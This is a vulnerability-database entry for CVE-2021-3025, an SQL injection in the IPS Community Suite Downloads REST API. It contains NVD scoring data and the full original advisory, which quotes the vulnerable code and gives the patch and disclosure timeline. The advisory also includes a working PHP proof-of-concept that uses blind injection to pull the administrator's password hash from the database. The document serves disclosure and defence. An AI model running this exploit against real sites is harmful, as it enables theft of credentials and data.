Description
Invision Community IPS Community Suite before 4.5.4.2 allows SQL Injection via the Downloads REST API: the sortDir parameter of a sortBy=popular request reaches the GETindex() method in applications/downloads/api/files.php without sanitization. As the linked advisory notes, exploitation requires a valid API key with permission to access the Downloads Files API, which matches the authenticated (PR:L / Au:S) CVSS vectors below.
Affected Software
Related
{"id": "CVE-2021-3025", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-3025", "description": "Invision Community IPS Community Suite before 4.5.4.2 allows SQL Injection via the Downloads REST API (the sortDir parameter in a sortBy=popular action to the GETindex() method in applications/downloads/api/files.php).", "published": "2021-01-08T07:15:00", "modified": "2021-01-15T17:17:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3025", "reporter": "cve@mitre.org", "references": ["https://invisioncommunity.com/release-notes/", "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html"], "cvelist": ["CVE-2021-3025"], "immutableFields": [], "lastseen": "2022-03-23T17:23:00", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160830"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-01-16T00:40:49", "tweets": 
[{"link": "https://twitter.com/WolfgangSesin/status/1350693230631936000", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-3025 (ips_community_suite)) has been published on https://t.co/F1Vi6E3Yut?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1350693228136304640", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-3025 (ips_community_suite)) has been published on https://t.co/aI7nyULJke?amp=1"}]}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160830"]}]}, "exploitation": null, "vulnersScore": 4.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "invisioncommunity:ips_community_suite", "version": "4.5.4.2", "operator": "lt", "name": "invisioncommunity ips community suite"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:invisioncommunity:ips_community_suite:4.5.4.2:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://invisioncommunity.com/release-notes/", "name": "https://invisioncommunity.com/release-notes/", "refsource": "MISC", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "name": "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"packetstorm": [{"lastseen": "2021-01-06T16:26:25", "description": "", "published": "2021-01-06T00:00:00", "type": "packetstorm", "title": "IPS Community Suite 4.5.4 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3025"], "modified": "2021-01-06T00:00:00", "id": "PACKETSTORM:160830", "href": "https://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "sourceData": "`----------------------------------------------------------------------------- \nIPS Community Suite <= 4.5.4 (Downloads REST API) SQL Injection Vulnerability \n----------------------------------------------------------------------------- \n \n \n[-] Software Link: \n \nhttps://invisioncommunity.com \n \n \n[-] Affected Versions: \n \nVersion 4.5.4 and prior versions. \n \n \n[-] Vulnerability Description: \n \nThe vulnerability is located within the \n/applications/downloads/api/files.php script, specifically into the \nGETindex() method: \n \n48. public function GETindex() \n49. { \n50. /* Where clause */ \n51. $where = array(); \n52. $sortBy = NULL; \n53. \n54. /* Sort by popular files */ \n55. if( \\IPS\\Request::i()->sortBy == 'popular' ) \n56. { \n57. \\IPS\\Request::i()->sortDir = \\IPS\\Request::i()->sortDir ?: 'ASC'; \n58. $sortBy = 'file_rating ' . \\IPS\\Request::i()->sortDir . ', \nfile_reviews'; \n59. $where = array( array( 'file_rating>?', 0 ) ); \n60. } \n61. \n62. /* Return */ \n63. return $this->_list( $where, 'categories', FALSE, $sortBy ); \n64. } \n \nUser input passed through the \"sortDir\" GET parameter (when \"sortBy\" \nis set to \"popular\") is not properly sanitized before being used to \nconstruct an SQL query at line 58. This can be exploited by remote \nattackers to e.g. read sensitive data from the database through \nerror-based SQL Injection attacks. Successful exploitation of this \nvulnerability requires an API key with permissions to access the \nDownloads Files API. 
\n \n \n[-] Proof of Concept: \n \nhttp://karmainsecurity.com/pocs/CVE-2021-3025 \n \n--- poc --- \n\"; print \"\\nExample....: php $argv[0] http://localhost/ips/ 6aaf2e085d179866ef40ad0ac9381b36\"; print \"\\nExample....: php $argv[0] https://invisioncommunity.com/ 765ed33ba595c4da8d64c6c22138aa16\\n\\n\"; die(); } list($url, $api_key) = [$argv[1], $argv[2]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, [\"Authorization: Bearer \".base64_encode($api_key)]); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $url = \"{$url}api/index.php?/downloads/files&sortBy=popular&sortDir=%s\"; $sql = \",(select case when (%s) then 1 else 1*(select table_name from information_schema.tables)end)=1#\"; $end = false; $min = true; $idx = 1; while (!$end) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sub_sql = \"select if(ord(substr(members_pass_hash,{$idx},1))<{$test},1,0) from core_members limit 1\"; curl_setopt($ch, CURLOPT_URL, sprintf($url, rawurlencode(sprintf($sql, $sub_sql)))); $min = !preg_match(\"/UNKNOWN_ERROR/\", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) $end = true; $pass .= chr($chr); $min = true; $idx++; print \"\\r[-] Admin's password hash: {$pass}\"; } print \"\\n\"; \n--- poc end --- \n \n \n \n[-] Solution: \n \nApply the vendor patch or upgrade to version 4.5.4.2 or later. \n \n \n[-] Disclosure Timeline: \n \n[19/12/2020] - Vendor notified through HackerOne \n[27/12/2020] - Vendor released a targeted patch \n[05/01/2021] - Vendor released version 4.5.4.2 \n[05/01/2021] - CVE number assigned \n[06/01/2021] - Public disclosure \n \n \n[-] CVE Reference: \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CVE-2021-3025 to this vulnerability. \n \n \n[-] Credits: \n \nVulnerability discovered by Egidio Romano. 
\n \n \n[-] Original Advisory: \n \nhttp://karmainsecurity.com/KIS-2021-01 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160830/KIS-2021-01.txt"}]}